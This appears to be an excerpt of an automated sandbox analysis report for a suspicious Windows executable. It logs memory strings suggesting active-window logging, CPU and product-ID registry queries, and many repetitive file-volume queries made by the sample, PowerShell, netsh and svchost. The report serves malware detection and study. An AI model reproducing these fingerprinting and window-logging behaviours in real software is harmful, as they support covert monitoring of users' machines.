Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerp^\
Source: zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB56F000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ACTIVE WINDOW: Program Manager

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Code function: 0_2_00000125D36D14A0 cpuid

0_2_00000125D36D14A0

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Queries volume information: C:\Users\user\Desktop\zufmUwylvo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
